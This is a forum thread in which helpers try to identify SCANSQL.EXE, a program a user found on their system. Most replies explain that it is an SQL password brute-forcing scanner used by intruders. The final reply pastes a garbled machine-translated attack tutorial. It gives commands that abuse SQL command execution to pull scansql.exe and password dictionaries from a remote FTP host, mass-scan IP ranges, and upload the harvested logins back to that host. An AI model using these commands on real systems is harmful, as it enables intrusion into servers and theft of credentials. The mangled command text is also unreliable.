Scansql.exe what is it

[Drazi-1]

I am a assistant mgr of Pc help group on MSN , and one of the members has been having a problem with a program call SCANSQL.EXE. Can anyone tell me what it's used for so i can inform the said person

Regards Drazi1

[keezel]

I searched google and there's a tutorial on SQL hacking on governmentsecurity.org that I can't get to and it lists Scansql.exe in the description of the web page. It'd be nice if I could access governmentsecurity.org to actually take a look at the tutorial but I can't even register. Anyway, t'would seem that Scansql.exe is malware of some form. It also seems that it comes from a different country as most other sites registered with google that turned up results on "Scansql.exe" were in a foreign language that I didn't recognize. I wish I could help out more but it seems like a strange bug for someone to get.

[moxnix]

I couldn't get to that page either, and when I translated the one page, it was a transcript of a IRC conversation that didn't really contain any usefull information. The other links my proximotron wouldn't let me reach or they came up with a 404 error.

I'll check Security Focas for it later.

[Und3ertak3r]

Did you try Google?

Hmm My inital attempt was all french..

Found this in a quick search of PacketStorm..

sqlscan v1.0 is intended to run against Microsoft SQL Server and attempts to connect directly to port 1433. Features the ability to scan one host or an IP list from an input file, the ability to scan for one SQL account password or multiple passwords from a dictionary file, and the ability to create an administrative NT backdoor account on vulnerable hosts, which will fail if xp_cmdshell is disabled on the server.

from here
http://www2.packetstormsecurity.org/...Bsearch%5D.y=0

I know it isn't ScanSql.exe .. I would be asking the person if they are using ANY DATABASE applications.. it maybe good it may be bad.. a check with the software publisher of the database app will tell volumes..

Cheers

[F1ReStArTeR]

this file is mostly used by FXP groups (hackers)...
this file gets a list of IPs that were identified as Computers who run SQL.
The file has a built-in list of common user names and passwords.
What it does is scan every IP it gets and trys on them the list of user names and passwords.
When it gets in it creates a log that informs the user about the IP and the user + pass.
those hackers are probably using that computer as a remote computer and run thier test on it so they can find more computers that are hackable.

[TidaLphasE23]

Seems to be a remote scanner thingy.


Remote Scanning of SQL::
Remote Scanning of SQL is not different with that from the 21 (see this PAGE ). There is only script (ordering of execution given to the SQL), as well as the logs employed. In this process it is not used Tscan.exe & Kill.exe, but:
[gloworange]ScanSQL.exe: the scanner.[/gloworange]
SQLpass.dic: library of Password.
Dict.txt: library of "User ".
Put besides that and script the technique is identhic. To have a IP 21 in anonymous access and of root "to dir: ->Exemple< - ). A SQL having "FTP.exe" present top. Here how that occurs:
(for example we will take the IP of the 21 like 0.0.0.0 )
Once the whole to give the responsability on the ftp to connect itself on the SQL via SQLExec ( here ).
1 l' addresses SQL - 2 le name of user - 3 le pass - 4 le format which is specific to chaques SQL - 5 CMD which where the lines of orders are returned

Here lines of orders to be returned in 5 CMD:
open echo 0.0.0.0 21> %windir%\system32\filepage.sys
echo to use anonymous nobody@nowhere.com > > %windir%\system32\filepage.sys
echo get scansql.exe > > %windir%\system32\filepage.sys
echo get sqlpass.dic > > %windir%\system32\filepage.sys
echo get dict.txt > > %windir%\system32\filepage.sys
echo quit > > %windir%\system32\filepage.sys
%windir%\system32\filepage.sys type
ftp - I - N - v - s:%windir%\system32\filepage.sys
There will be probably error messages of the type SQL_ERROR or SQL_NO_DATA, which is normal.
But if with standard order the "%windir%\system32\filepage.sys " nothing is posted on the principal window then it will be necessary to change Format ( 4 ), and to start again until it is good.
SQLExec will block with order " ftp - I - N - v - s:%windir%\system32\filepage.sys " what is normal, it will be released at the end of the loading of the 21 towards the SQL of the 4 files. If all is well to pass the SQL is ready to start with scanner, but for more precautions it is imperative to check if all is there. Here orders of checks:
to dir scansql.exe
to dir scansql.txt
to dir sqlpass.dic
to dir dict.txt
If it misses files to you starting again the procedure of transfer. If you look at the lines of orders well it all will not be necessary to remake but just what it is necessary for what it misses. Once made check again.
If all on the SQL the line of order is here to launch the scanning:
scansql x.x.x.x y.y.y.y 200
" X " representing the starting IP of the scann, and " y " IP of end of scann. And 200 the number of Threads (a number of IP scannées simultaneously).
For the recuperation of the results of Remote Scanning:
It is préfereable to check and/or recupérer the results all the 24h approximately. For that it will be necessary for you to be connected to the SQL and to return in ( 5 ) CMD the following order to see the file of the results:
to dir scansql.txt
If the file scansql.txt with a size of 0, is the scann it is arrété or that it did not find a SQL. yet If the file with a size it is enough to the transferer of the SQL towards 21 in order to it recuperer. Here lines of orders:
open echo 0.0.0.0 21> %windir%\system32\filepage.sys
echo to use anonymous nobody@nowhere.com>>%windir%\system32\filepage.sys
echo could scansql.txt > > %windir%\system32\filepage.sys
echo quit > > %windir%\system32\filepage.sys
%windir%\system32\filepage.sys type
ftp - I - N - v - s:%windir%\system32\filepage.sys
It should be known that Pass being in the library are those which are courament used. A fear of the lapse of memory which creates a facility.



Sqlscan.exe is a trojan


Hope this is what you were looking for.....